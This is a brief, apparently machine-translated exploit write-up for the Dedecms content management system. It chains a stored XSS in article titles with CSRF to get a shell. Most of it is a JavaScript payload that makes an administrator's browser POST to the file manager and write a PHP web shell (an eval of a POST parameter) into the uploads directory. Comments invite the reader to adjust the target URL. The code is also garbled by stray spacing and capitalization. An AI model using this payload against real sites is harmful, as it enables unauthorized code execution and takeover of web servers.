Dedecms uses xss + csrf getshell

Dedecms has many vulnerabilities, but the vendor does not fix them.
In the previous double injection vulnerability, the title was able to be xss, but the official website only fixed the injection vulnerability. The xss did not fix the vulnerability, but added addslashes to the title.

Xss triggering in the background

Use js Code

Var request = false; if (window. XMLHttpRequest) {request = new XMLHttpRequest (); if (request. overrideMimeType) {request. overrideMimeType ('text/xml');} else if (window. activeXObject) {var versions = ['Microsoft. XMLHTTP ', 'msxml. XMLHTTP ', 'Microsoft. XMLHTTP ', 'msxml2. XMLHTTP.7.0 ', 'msxml2. XMLHTTP.6.0 ', 'msxml2. XMLHTTP.5.0 ', 'msxml2. XMLHTTP.4.0 ', 'msxml2. XMLHTTP.3.0 ', 'msxml2. XMLHTTP ']; for (var I = 0; I <versions. length; I ++) {try {request = new ActiveXObject (versions [I]);} catch (e) {}} xmlhttp = request; getshell (); function getshell () {var postStr = "fmdo = edit & backurl = & activepath = % 2 Fdedecmsfullnew % 2 Fuploads % 2 Fuploads & filename = paxmac. php & str = % 3C % 3 Fphp + eval % 28% 24_POST % 5B % 27cmd % 27% 5D % 29% 3B % 3F % 3E & B1 = ++ % B1 % A3 + % B4 % E6 ++ "; // modify the xmlhttp url by yourself. open ("POST "," http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php ", True); // you need to modify xmlhttp by yourself. setRequestHeader ("Content-type", "application/x-www-form-urlencoded"); xmlhttp. setRequestHeader ("Content-length", postStr. length); xmlhttp. setRequestHeader ("Connection", "close"); xmlhttp. send (postStr );}

 

 

Before triggering

After triggering